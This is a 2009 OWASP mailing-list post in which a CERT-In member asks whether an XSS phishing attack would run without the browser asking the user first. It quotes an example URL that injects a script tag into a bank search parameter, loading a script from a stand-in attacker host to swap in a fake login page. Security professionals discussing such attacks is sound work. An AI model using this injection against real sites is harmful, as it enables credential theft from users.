[Owasp-delhi] Phishing with XSS

Parmendra Sharma s.parmendra at gmail.com
Wed Feb 25 06:26:56 EST 2009


Hello OWASP Members,

I have a doubt and here it is......

In performing Phishing with XSS a script like "do.js "


"http://www.attacked-bank.com/module.asp?search=<Script
src=http://attacker-IP-address/do.js/>"

can be used to change the original login page to the attackers choice
without actually changing the URL.

Now my question is that for performing the abovesaid case this script needs
to be executed by the browser without the user's concent. In general
scenerio while requesting for a script like this first a Pop up is given by
the browser asking whether to run or to save the script.

Please suggest.



-- 
Thanks and Regards:

Parmendra Sharma
Indian Computer Emergency Response Team (CERT-In)
Ministry of Information Technology
Government of India
6 C.G.O Complex
Lodhi Road
New Delhi
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090225/1ff5e326/attachment.html 


More information about the Owasp-delhi mailing list